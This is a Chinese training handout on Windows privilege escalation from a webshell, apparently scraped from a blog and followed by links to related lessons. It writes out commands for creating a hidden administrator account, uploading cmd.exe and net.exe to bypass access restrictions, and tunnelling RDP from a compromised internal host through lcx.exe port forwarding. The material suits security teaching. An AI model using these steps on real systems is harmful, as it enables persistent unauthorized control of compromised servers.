米斯特白帽培训讲义 漏洞篇 提权

讲师:gh0stkey

整理:飞龙

协议:CC BY-NC-SA 4.0

提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 guest,通过提权后就变成超级管理员,拥有了管理 Windows 的所有权限。提权是黑客的专业名词,一般用于网站入侵和系统入侵。本讲义所讲的是基于 WebShell 的菜刀管理下提权。

基本 Dos 命令、常识

  • whoami:查看当前用户名,用于查看权限大小。
  • ipconfig:显示当前 TCP/IP 配置,用于查看 IP。
  • net user:查看当前系统的所有用户。
  • net user <用户名> <用户密码> /add:创建用户。
  • net localgroup administrators <用户名> /add:将用户加入administrators用户组。
  • 远程连接默认端口:3389。

下面拿菜刀中的 Shell 演示一遍这几个命令。

首先是whoami,可以看到administrator,应该是管理员。

然后是ipconfig,我们可以看到192.168.175.129,这是内网的 IP。

然后是net user

知道这些用户之后,我们需要创建自己的用户mst。创建后再执行net user,可以看到创建成功:

接下来我们创建一个名为mst$的用户:

可以看到它并没有显示在用户列表中,之后我们再执行net user mst$

它又是确实存在的,这就是隐藏用户的一个小技巧。

之后我们把mst$添加到管理员组中,并且查看它的信息,我们发现它成功刚添加到了管理员组中。

需要远程连接的时候,输入刚刚创建的用户名和密码就可以了。

突破限制

假如说我们在实际情况中看到了[Err]拒绝访问

那我们可以找到自己电脑上的cmd.exe,然后上传上去。比如上传路径如下:

我们就可以执行setp <路径>\cmd.exe

我们再来看各种命令:

net user还是拒绝访问的,我们用老方法,找到自己电脑中的net.exe,然后传上去。之后执行<路径>\net.exe user

可以看到突破了限制。

端口转发

在提权过程中,我们经常碰到这样的情况:

我们可以看到 WebShell 的主机处于内网下,内网的意思就是说,它能连接别人,但别人不能连接它,就跟连接路由器的个人电脑差不多。

那么这种情况下,我们就需要用到端口转发工具lcx.exe,除此之外,还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡,独立 IP 主机叫做本机。

lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP 为119.90.140.191

然后我们在本机执行:

lcx.exe -listen 51 3388

这条命令的意思就是说,监听本机的 51 和 3388 端口,并将两个端口互相转发,端口 51 的入境流量发给端口 3388,反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口,为了避免与本机的远程连接服务冲突,选择了 3388。大家可以自行选择其他未占用端口。

然后我们在肉鸡上执行:

lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389

这条命令连接肉鸡的 3389 端口,和本机的 51 端口,并互相转发。

之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388,可以看到lcx中显示了转发的信息。

远程连接客户端的封包会发给主机的lcx,之后会发给肉鸡的lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。

等待一会儿之后,我们成功连接了肉鸡的远程桌面:

米斯特白帽培训讲义 漏洞篇 提权相关推荐

  1. 米斯特白帽培训讲义 漏洞篇 逻辑漏洞

    米斯特白帽培训讲义 漏洞篇 逻辑漏洞 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 任意密码找回 这是补天平台上的一个案例: http://www.118114.cn/re ...

  2. 米斯特白帽培训讲义 漏洞篇 CSRF

    米斯特白帽培训讲义 漏洞篇 CSRF 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 CSRF(Cross-site request forgery跨站请求伪造,也被称为&q ...

  3. 米斯特白帽培训讲义 漏洞篇 文件上传

    米斯特白帽培训讲义 漏洞篇 文件上传 讲师:gh0stkey 整理:飞龙 协议:[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc- ...

  4. 米斯特白帽培训讲义 漏洞篇 越权

    米斯特白帽培训讲义 漏洞篇 越权 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 越权漏洞是 Web 应用程序中一种常见的安全漏洞.它的威胁在于一个账户即可控制全站用户数据. ...

  5. 米斯特白帽培训讲义 漏洞篇 XSS

    米斯特白帽培训讲义 漏洞篇 XSS 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 分类 总共有三种 反射型:经过后端,不经过数据库 存储型:经过后端,经过数据库 DOM:不 ...

  6. 米斯特白帽培训讲义 漏洞篇 SQL 注入

    米斯特白帽培训讲义 漏洞篇 SQL 注入 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理与危害 SQL 注入就是指,在输入的字符串中注入 SQL 语句,如果应用相信用户 ...

  7. 米斯特白帽培训讲义 漏洞篇 代码执行

    米斯特白帽培训讲义 漏洞篇 代码执行 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理 由于开发人员编写源码时,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提 ...

  8. 米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历

    米斯特白帽培训讲义 漏洞篇 弱口令.爆破.遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜 ...

  9. 米斯特白帽培训讲义 漏洞篇 文件包含

    米斯特白帽培训讲义 漏洞篇 文件包含 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理 文件包含就是将一个文件包含到自己的文件中执行.它可分为本地包含和远程包含,本地包含 ...

最新文章

  1. UA MATH564 概率论 Dirichlet分布
  2. 点云插值:三维平面参数确定-不共线三点的平面方程
  3. oracle report builder 6i下载,oracle report builder 6i - 数据模型中的SQL查询代码
  4. 【MySQL】时区设置引发的卡顿
  5. [android] 手机卫士设置向导页面
  6. Android JNI(三)——JNI数据结构之JNINativeMethod
  7. 吴恩达《机器学习》第一章:监督学习和无监督学习
  8. 211学校计算机报考人数信息,速查!这些985 211学校已发布考研调剂信息
  9. 高速软件加密锁技术的发展历程
  10. Dijkstra最短路径
  11. svn删除文件文件夹(遇到的问题解决)
  12. 电脑上网前必须要安装的四个补丁
  13. vs C3861 “rand”: 找不到标识符 ConsoleApplication1
  14. 产品优化策略,有效提升产品自身竞争力,我赌你一定没用过
  15. TTL信号也能高速稳定的传输100m+,是的,你没有听错,量产电路推荐
  16. Base64与bitmap之间相互转换
  17. 微信小程序 阻止事件冒泡
  18. 【机器学习、深度学习与强化学习】机器学习(2)---决策树(1)
  19. 学习python必备软件
  20. 如何设计一款优秀的短视频 SDK

热门文章

  1. python程序设计实验报告实验程序流程序列化_Python程序设计_教学大纲_段震.doc
  2. 【openMV】霍夫变换---直线提取
  3. 计算机职称考试知识点,职称计算机考试复习知识点
  4. mysql报错注入实战_手工注入——MySQL手工注入实战和分析
  5. 列表ls按照升序排列的python内置函数是_Python习题集
  6. java 文件中查找指定的单词,查找指定文本文件中的单词数的Java程序
  7. php curl 批量,关于用php的curl批量抓取内容
  8. 贝叶斯网络结构学习方法
  9. 数据对象、属性和相似性
  10. html 的layer的属性,layer属性